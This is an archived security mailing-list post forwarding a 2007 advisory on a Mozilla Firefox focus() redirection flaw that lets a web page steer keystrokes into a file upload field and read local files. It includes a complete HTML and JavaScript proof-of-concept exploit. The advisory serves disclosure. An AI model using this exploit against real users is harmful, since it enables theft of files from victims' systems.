Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Mozilla Firefox focus() Redirection Vulnerability



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Wednesday, July 04, 2007 3:16 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Mozilla Firefox focus() Redirection Vulnerability
>
>
> Mozilla Firefox focus() Redirection Vulnerability
>
>
>
> A vulnerability in Mozilla Firefox allows the attacker to
> silently redirect focus of selected key press events to an
> otherwise protected file upload form field. This is possible
> because of how onKeyDown event is handled, allowing the focus
> to be moved between the two. This enables the attacker to
> read arbitrary files on victim's system.
>
>
> Vulnerable Systems:
>  * Mozilla Firefox version 2.0.0.4 and prior
>
> Exploit:
> <html>
> <body>
> <script>
> function restore()
> {
>
> document.getElementById("text1").value=document.getElementById
> ("file1").value;
>  document.getElementById("text1").focus();
> }
>
> function doKeyDown()
> {
>  document.getElementById("label1").focus();
> }
> </script>
>
> <input type="file" id="file1" name="file1"
> onkeydown="restore();" onkeyup="restore()" />
> <label for="file1" id="label1" name="label1"></label>
> <br>
> <textarea name="text1" id="text1" onkeydown="doKeyDown()">
> </textarea>
> </body>
> </html>
>
>
> Additional Information:
> The information has been provided by carl hardwick
> <mailto:hardwick.carl@xxxxxxxxx> .
> The original article can be found at:
> http://yathong.googlepages.com/FirefoxFocusBug.html
>
>



 




Copyright © Lexa Software, 1996-2009.